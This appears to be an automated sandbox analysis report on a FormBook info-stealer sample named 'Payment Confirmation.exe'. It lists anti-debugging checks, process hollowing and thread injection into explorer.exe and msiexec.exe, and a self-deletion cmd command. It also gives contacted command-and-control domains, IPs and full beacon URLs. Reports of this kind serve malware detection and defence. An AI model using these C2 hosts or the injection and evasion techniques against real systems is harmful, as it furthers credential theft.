Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h] 11_2_044E9240
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h] 11_2_044E9240
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h] 11_2_044E9240
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h] 11_2_044E9240
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h] 11_2_044F7E41
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h] 11_2_044F7E41
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h] 11_2_044F7E41
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h] 11_2_044F7E41
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h] 11_2_044F7E41
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h] 11_2_044F7E41
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F766D mov eax, dword ptr fs:[00000030h] 11_2_044F766D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h] 11_2_0450AE73
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h] 11_2_0450AE73
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h] 11_2_0450AE73
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h] 11_2_0450AE73
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h] 11_2_0450AE73
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0452927A mov eax, dword ptr fs:[00000030h] 11_2_0452927A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0459B260 mov eax, dword ptr fs:[00000030h] 11_2_0459B260
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0459B260 mov eax, dword ptr fs:[00000030h] 11_2_0459B260
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B8A62 mov eax, dword ptr fs:[00000030h] 11_2_045B8A62
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F8A0A mov eax, dword ptr fs:[00000030h] 11_2_044F8A0A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04503A1C mov eax, dword ptr fs:[00000030h] 11_2_04503A1C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451A61C mov eax, dword ptr fs:[00000030h] 11_2_0451A61C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451A61C mov eax, dword ptr fs:[00000030h] 11_2_0451A61C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EC600 mov eax, dword ptr fs:[00000030h] 11_2_044EC600
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EC600 mov eax, dword ptr fs:[00000030h] 11_2_044EC600
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EC600 mov eax, dword ptr fs:[00000030h] 11_2_044EC600
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04518E00 mov eax, dword ptr fs:[00000030h] 11_2_04518E00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EAA16 mov eax, dword ptr fs:[00000030h] 11_2_044EAA16
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EAA16 mov eax, dword ptr fs:[00000030h] 11_2_044EAA16
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0459FE3F mov eax, dword ptr fs:[00000030h] 11_2_0459FE3F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EE620 mov eax, dword ptr fs:[00000030h] 11_2_044EE620
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B8ED6 mov eax, dword ptr fs:[00000030h] 11_2_045B8ED6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04528EC7 mov eax, dword ptr fs:[00000030h] 11_2_04528EC7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0459FEC0 mov eax, dword ptr fs:[00000030h] 11_2_0459FEC0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04512ACB mov eax, dword ptr fs:[00000030h] 11_2_04512ACB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045136CC mov eax, dword ptr fs:[00000030h] 11_2_045136CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F76E2 mov eax, dword ptr fs:[00000030h] 11_2_044F76E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045116E0 mov ecx, dword ptr fs:[00000030h] 11_2_045116E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04512AE4 mov eax, dword ptr fs:[00000030h] 11_2_04512AE4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451D294 mov eax, dword ptr fs:[00000030h] 11_2_0451D294
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451D294 mov eax, dword ptr fs:[00000030h] 11_2_0451D294
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0457FE87 mov eax, dword ptr fs:[00000030h] 11_2_0457FE87
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451FAB0 mov eax, dword ptr fs:[00000030h] 11_2_0451FAB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h] 11_2_044E52A5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h] 11_2_044E52A5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h] 11_2_044E52A5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h] 11_2_044E52A5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h] 11_2_044E52A5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045646A7 mov eax, dword ptr fs:[00000030h] 11_2_045646A7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B0EA5 mov eax, dword ptr fs:[00000030h] 11_2_045B0EA5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B0EA5 mov eax, dword ptr fs:[00000030h] 11_2_045B0EA5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B0EA5 mov eax, dword ptr fs:[00000030h] 11_2_045B0EA5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FAAB0 mov eax, dword ptr fs:[00000030h] 11_2_044FAAB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FAAB0 mov eax, dword ptr fs:[00000030h] 11_2_044FAAB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B8B58 mov eax, dword ptr fs:[00000030h] 11_2_045B8B58
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EDB40 mov eax, dword ptr fs:[00000030h] 11_2_044EDB40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FEF40 mov eax, dword ptr fs:[00000030h] 11_2_044FEF40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EF358 mov eax, dword ptr fs:[00000030h] 11_2_044EF358
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04513B7A mov eax, dword ptr fs:[00000030h] 11_2_04513B7A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04513B7A mov eax, dword ptr fs:[00000030h] 11_2_04513B7A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EDB60 mov ecx, dword ptr fs:[00000030h] 11_2_044EDB60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FFF60 mov eax, dword ptr fs:[00000030h] 11_2_044FFF60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B8F6A mov eax, dword ptr fs:[00000030h] 11_2_045B8F6A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A131B mov eax, dword ptr fs:[00000030h] 11_2_045A131B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0450F716 mov eax, dword ptr fs:[00000030h] 11_2_0450F716
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0457FF10 mov eax, dword ptr fs:[00000030h] 11_2_0457FF10
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0457FF10 mov eax, dword ptr fs:[00000030h] 11_2_0457FF10
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B070D mov eax, dword ptr fs:[00000030h] 11_2_045B070D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B070D mov eax, dword ptr fs:[00000030h] 11_2_045B070D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451A70E mov eax, dword ptr fs:[00000030h] 11_2_0451A70E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451A70E mov eax, dword ptr fs:[00000030h] 11_2_0451A70E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E4F2E mov eax, dword ptr fs:[00000030h] 11_2_044E4F2E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E4F2E mov eax, dword ptr fs:[00000030h] 11_2_044E4F2E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451E730 mov eax, dword ptr fs:[00000030h] 11_2_0451E730
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045653CA mov eax, dword ptr fs:[00000030h] 11_2_045653CA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045653CA mov eax, dword ptr fs:[00000030h] 11_2_045653CA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045237F5 mov eax, dword ptr fs:[00000030h] 11_2_045237F5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h] 11_2_045103E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h] 11_2_045103E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h] 11_2_045103E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h] 11_2_045103E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h] 11_2_045103E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h] 11_2_045103E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F1B8F mov eax, dword ptr fs:[00000030h] 11_2_044F1B8F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F1B8F mov eax, dword ptr fs:[00000030h] 11_2_044F1B8F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451B390 mov eax, dword ptr fs:[00000030h] 11_2_0451B390
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04567794 mov eax, dword ptr fs:[00000030h] 11_2_04567794
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04567794 mov eax, dword ptr fs:[00000030h] 11_2_04567794
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04567794 mov eax, dword ptr fs:[00000030h] 11_2_04567794
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A138A mov eax, dword ptr fs:[00000030h] 11_2_045A138A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0459D380 mov ecx, dword ptr fs:[00000030h] 11_2_0459D380
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F8794 mov eax, dword ptr fs:[00000030h] 11_2_044F8794
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B5BA5 mov eax, dword ptr fs:[00000030h] 11_2_045B5BA5
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_00409B50 LdrLoadDll, 4_2_00409B50
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10009B80 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_10009B80

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 52.206.159.80 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.91.80.182 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.thesewhitevvalls.com
Source: C:\Windows\explorer.exe Domain query: www.lumberjackguitarloops.com
Source: C:\Windows\explorer.exe Domain query: www.elliotpioneer.com
Source: C:\Windows\explorer.exe Domain query: www.carts-amazon.com
Source: C:\Windows\explorer.exe Domain query: www.chinaopedia.com
Source: C:\Windows\explorer.exe Network Connect: 3.223.115.185 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.anadolu.academy
Source: C:\Windows\explorer.exe Domain query: www.playstarexch.com
Source: C:\Windows\explorer.exe Network Connect: 172.105.103.207 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 62.210.5.81 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.altitudebc.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 94.73.147.156 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.unasolucioendesa.com
Source: C:\Windows\explorer.exe Domain query: www.atp-cayenne.com
Source: C:\Windows\explorer.exe Network Connect: 82.98.134.154 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Payment Confirmation.exe Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 9B0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Payment Confirmation.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Payment Confirmation.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Payment Confirmation.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Payment Confirmation.exe Memory written: C:\Users\user\Desktop\Payment Confirmation.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread register set: target process: 3440 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe' Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe' Jump to behavior
Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.386546545.00000000008B8000.00000004.00000020.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.410368424.0000000000EE0000.00000002.00020000.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000005.00000000.410368424.0000000000EE0000.00000002.00020000.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_100098FF cpuid 1_2_100098FF
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10012E30 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_10012E30
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 1_2_004030FB

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502129 Sample: Payment Confirmation.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 31 www.6233v.com 2->31 33 pflvcllbpf.hellomyai.com 2->33 35 2 other IPs or domains 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 9 other signatures 2->49 11 Payment Confirmation.exe 17 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\nawgsdqut.dll, PE32 11->29 dropped 59 Injects a PE file into a foreign processes 11->59 15 Payment Confirmation.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.atp-cayenne.com 62.210.5.81, 49842, 80 OnlineSASFR France 18->37 39 www.thesewhitevvalls.com 172.105.103.207, 49810, 80 LINODE-APLinodeLLCUS United States 18->39 41 15 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 msiexec.exe 18->22         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
52.206.159.80
 propage.beatstars.com United States
14618 AMAZON-AESUS false
45.91.80.182
 chinaopedia.com United Kingdom
209484 ASIANETGB true
172.105.103.207
 www.thesewhitevvalls.com United States
63949 LINODE-APLinodeLLCUS true
62.210.5.81
 www.atp-cayenne.com France
12876 OnlineSASFR true
34.102.136.180
 playstarexch.com United States
15169 GOOGLEUS false
94.73.147.156
 anadolu.academy Turkey
34619 CIZGITR true
82.98.134.154
 www.unasolucioendesa.com Spain
42612 DINAHOSTING-ASES true
3.223.115.185
 HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com United States
14618 AMAZON-AESUS false

Contacted Domains

Name IP Active
propage.beatstars.com 52.206.159.80 true
www.thesewhitevvalls.com 172.105.103.207 true
chinaopedia.com 45.91.80.182 true
playstarexch.com 34.102.136.180 true
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com 3.223.115.185 true
anadolu.academy 94.73.147.156 true
elliotpioneer.com 34.102.136.180 true
pflvcllbpf.hellomyai.com 134.122.133.171 true
www.unasolucioendesa.com 82.98.134.154 true
www.atp-cayenne.com 62.210.5.81 true
carts-amazon.com 34.102.136.180 true
www.anadolu.academy unknown unknown
www.playstarexch.com unknown unknown
www.lumberjackguitarloops.com unknown unknown
www.altitudebc.com unknown unknown
www.elliotpioneer.com unknown unknown
www.6233v.com unknown unknown
www.carts-amazon.com unknown unknown
www.chinaopedia.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.playstarexch.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== false
  • Avira URL Cloud: safe
 unknown
http://www.chinaopedia.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== true
  • Avira URL Cloud: safe
 unknown
http://www.anadolu.academy/b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz true
  • Avira URL Cloud: safe
 unknown
http://www.unasolucioendesa.com/b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz true
  • Avira URL Cloud: safe
 unknown
http://www.lumberjackguitarloops.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== true
  • Avira URL Cloud: safe
 unknown
http://www.elliotpioneer.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== false
  • Avira URL Cloud: safe
 unknown
http://www.altitudebc.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== true
  • Avira URL Cloud: safe
 unknown
http://www.carts-amazon.com/b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz false
  • Avira URL Cloud: safe
 unknown
http://www.atp-cayenne.com/b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz true
  • Avira URL Cloud: safe
 unknown
www.thesewhitevvalls.com/b2c0/ true
  • Avira URL Cloud: safe
 low